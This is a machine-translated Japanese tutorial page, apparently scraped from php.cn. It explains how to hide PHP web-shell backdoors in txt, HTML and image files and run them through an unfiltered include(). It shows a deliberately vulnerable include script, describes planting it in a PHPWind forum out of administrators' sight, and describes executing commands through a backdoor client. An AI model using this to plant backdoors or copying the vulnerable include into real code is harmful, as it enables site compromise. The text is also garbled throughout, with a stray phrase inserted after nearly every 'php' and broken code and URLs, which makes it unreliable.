コミュニティ 学ぶ ツールライブラリ レジャー
検索
日本語
ホームページ > バックエンド開発 > PHPチュートリアル > 本文

PHP Web サイト Backdoor_PHP チュートリアルの隠しトリックに関するテスト レポート

WBOY
リリース: 2016-07-13 17:32:28
オリジナル
983 人が閲覧しました

php(現在の主流の開発言語として)ステートメントをイメージに入れただけでは、いずれにしても実行されないことを知っておく必要があります。php(現在の主流の開発言語として)はphpの拡張子のみを解析するためです。 (現在の主流の開発言語として) ファイル。したがって、画像内に隠されたphp(現在主流の開発言語として)ステートメントを実行できる必要があります。 php(現在の主流の開発言語として)の呼び出し関数(include、requireなど)を使用するだけです。

数日前にトロイの木馬を写真に隠すという記事を私たちはまだ覚えています。つまり、php(現在の主流の開発言語として)ファイルで、include("x.gif") のようなステートメントを使用して、画像に隠されたトロイの木馬ステートメントを呼び出します。 ASP のステートメントも同様です。非常に隠されているように見えますが、php (現​​在主流の開発言語) について少しでも知っている人であれば、イメージを直接呼び出して疑わしいものを見つけることは難しくありません。 URL の GET メソッドではパラメータを渡すことが難しいため、トロイの木馬挿入のパフォーマンスを最大限に活用できません。

include関数はphp(現在の主流の開発言語)でより頻繁に使用されているため、php(現在の主流の開発言語)WIND1.36などのセキュリティ上の問題が多すぎます。後ろの変数によってフィルタリングされていないことが含まれます。これから、同様のステートメントを構築して php (現​​在の主流の開発言語として) ファイルに挿入できます。次に、トロイの木馬を画像または HTML ファイルに隠します。これは、より隠蔽性が高いと言えます。たとえば、php(現在の主流の開発言語として)WIND フォーラムに次のステートメントを挿入します: (現在の主流の開発言語として)WIND_ROOT;? @include include/.$php(現在主流の開発言語として)WIND_ROOT;?>>一般管理者は見ることができません。

include 関数の助けを借りて、php(現在の主流の開発言語として)トロイの木馬を、txt、html、画像ファイルなどのさまざまな種類のファイルに隠すことができます。 txt、html、画像ファイルの 3 種類のファイルはフォーラムや記事システムで最も一般的であるため、以下の順序でテストを実行します。

まず php (現​​在の主流の開発言語として) ファイル test.php (現​​在の主流の開発言語として) を作成します ファイルの内容は次のとおりです:

<?php (現​​在の主流の開発言語として) ) )
$test=$_GET[test];
@include test/.$test;
?>

Txt ファイルは一般に説明ファイルなので、ディレクトリの説明ファイルに一文のトロイの木馬を入れます。大丈夫です 。 TXT ファイル t.txt を作成するだけです。 Trojan という文を t.txt ファイルに貼り付けます。次に、 http://localhost/test/test.php (現​​在の主流の開発言語として) にアクセスします?test=../t.txt (現​​在の主流の開発言語として) ) w/index.php(現在の主流の開発言語として)?php(現在の主流の開発言語として)WIND_ROOT=../robots.txt>t.txtの中身を見ればOKです、そして、lanker microphp(現在の主流の開発言語として)のバックドアクライアントのトロイの木馬アドレスをhttp://localhost/test/test.php(現在の主流の開発言語として)に追加します?test=../t .txt <http://localhost/php(現在の主流の開発言語として)w/index.php(現在の主流の開発言語として)?php(現在の主流の開発言語として) 現在の主流の開発言語)WIND_ROOT=../robots.txt> パスワードに cmd を追加するだけで、実行によって返される結果を確認できます。

HTMLファイルの場合、通常はテンプレートファイルです。 HTML ファイルに挿入されたトロイの木馬を表示せずに呼び出して実行できるようにするには、次のような隠し属性を持つテキスト ボックスを HTML に追加します。 その後、上記と同じ方法を使用します。実行によって返される結果は、通常、ソース ファイルを表示することで確認できます。 たとえば、このプログラムのディレクトリを表示する機能を使用します。ソース ファイルの内容を として表示すると、ディレクトリは C:Uniserver2_7swww est として取得できます。

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/508706.html技術記事 (現在の主流の開発言語としての) PHP ステートメントをイメージに挿入しただけでは、いずれにしても実行されないことを知っておく必要があります。PHP (現在の主流の開発言語として) は拡張子のみを解析するためです...
関連ラベル:
php 主流 開発する スキル バンドル 報告 テスト 知る Webサイト 欲しい 声明 言語 隠れる
ソース:php.cn
前の記事:GDを使用して横棒グラフ、縦棒グラフ、折れ線グラフを生成するクラス library_PHPチュートリアル 次の記事:PHP を使用して Web ベースのファイル管理システムを作成する_PHP チュートリアル
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
著者別の最新記事
最新の問題
URL パラメータから取得した PHP 配列が期待どおりに動作しない カテゴリ ID を含む URL パラメータがあり、それを次のような配列として扱いたいと考えています: http://example.com?cat[]=3,9,13 PHP では、...
から 2024-04-06 22:09:02
0
1
1428
ApacheのどこにCustomLogディレクティブを配置すればよいですか 私はphp:7.2-apachedockerを使用しています。ヘルスチェック URL ログイン アクセス ログを無効にする必要があります。このリンクに基づいて、Customlog ...
から 2024-04-06 22:03:59
0
1
990
戻り値の変数の形式は何ですか? 私はphpの初心者です。コードを見つけました: if($x<time()){return[false,'error'];} ロジックや変数は重要ではありませんが、[false...
から 2024-04-06 21:55:20
0
1
778
opentbs を使用して odt ファイルを生成するときに発生する問題: 同じキーの値が別の列ではなく同じ行に表示されます。 PHPでodtを作成するためにOpenTbsというライブラリを使っていますが、列と行が動的に生成されるので利用しています。行と列の作成方法は知っていますが、それらを整理する方法がわ...
から 2024-04-06 20:18:18
0
1
483
ループするために MySQL の結果を ID ごとにグループ化する mysqlにフライトデータを含むテーブルがあります。 codeigniter3Journey_idair_idFlightDurationout_or_inflightdurati...
から 2024-04-06 17:27:56
0
1
406
関連トピック
詳細>
人気のおすすめ
人気のチュートリアル
詳細>
関連するチュートリアル
人気のおすすめ
最新のコース
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート